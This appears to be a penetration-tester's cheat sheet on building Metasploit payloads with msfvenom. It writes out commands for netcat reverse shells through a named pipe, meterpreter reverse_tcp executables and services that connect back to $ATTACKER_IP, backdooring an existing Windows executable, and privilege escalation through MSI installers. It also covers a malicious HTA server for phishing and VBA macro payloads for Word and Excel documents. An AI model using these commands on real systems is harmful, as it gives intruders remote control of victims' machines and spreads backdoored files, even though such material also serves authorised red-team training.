msfvenom is a tool to create custom versions of Metasploit payloads, encoded into a variety of different binary formats and scripts. For example:
# Use Metasploit to generate the code for a remote shell:#msfvenom -p cmd/unix/reverse_netcat \ lhost=$LOCAL_IP lport=$LOCAL_PORT# Spin up a listener using netcat:#nc -lvp $LOCAL_PORT
mkfifo /tmp/qdsrgu creates a named pipe at /tmp/qdsrgu.
We then spin up a netcat instance directed at our local machine (nc $LOCAL_IP $LOCAL_PORT), direct the contents of the pipe into netcat’s STDIN (0< /tmp/qdsrgu), pipe the output of netcat to a shell we know probably exists (| /bin/sh), and finally redirect both STDOUT and STDERR back into the named pipe (> /tmp/qdsrgu 2>&1).
On the local machine, nc -lvp $LOCAL_PORT listens for the incoming netcat connection from the remote. Anything we type on STDIN here gets sent to the remote and piped to /bin/sh there. The output of /bin/sh is then sent to the named pipe, which dumps into (the remote) netcat, which then sends the data to the local machine where it ends up on STDOUT.
Use --list formats to see available encoding formats. In general, shell scripts can always be produced by specifying -f raw and an output file with the appropriate extension.
# 64-bit Windows executable meterpreter payload#msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \ -f exe -o ${NAME}.exe# 64-bit Windows SERVICE executable (note that these require# additional API calls to work, beyond what `-f exe` provides)#msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \ -f exe-service -o ${NAME}.exe# Add a meterpreter backdoor to an existing executable#msfvenom -a x64 --platform windows -x $ORIGINAL_EXE -k \ -p windows/meterpreter/reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \ -b "\x00" -f exe -o $BACKDOORED_EXE
Note that by default msfvenom produces 64-bit executables when using the -f exe. This doesn’t work, however, if you’re trying to replace a program in Program Files (x86). In this case, you’ll need to explicitly instruct msfvenom to encode a 32-bit binary using -e x86/shikata_ga_nai.
MSI installers
If AlwaysInstallElevated is set to 1 under both of the following registry keys, then MSI installers will run as SYSTEM.
Catch with the standard nc -lvp $ATTACKER_PORTnetcat command.
Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server. Critical variables to set:
LHOST — the host IP address to connect back to
LPORT — the port to connect back to
SRVHOST — the host IP address to serve the malicious file on
payload — the Metasploit payload to use
In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (i.e., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a meterpreter shell, rather than just a plain reverse shell!
Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.
Metasploit’s msfvenom can create VBA payloads, as one might expect. Despite WSH not wanting to pop cmd.exe or other executables (outside of calc.exe), a meterpreter reverse shell actually works! (That said, it will die when Word does, and thus needs to be migrated to a new process ASAP…)
To work, the VBA output must be copied into a Microsoft Office document as a macro. By default msfvenom will use the Workbook_Open() function; this is suitable for Excel, but must be changed to Document_Open() for Word.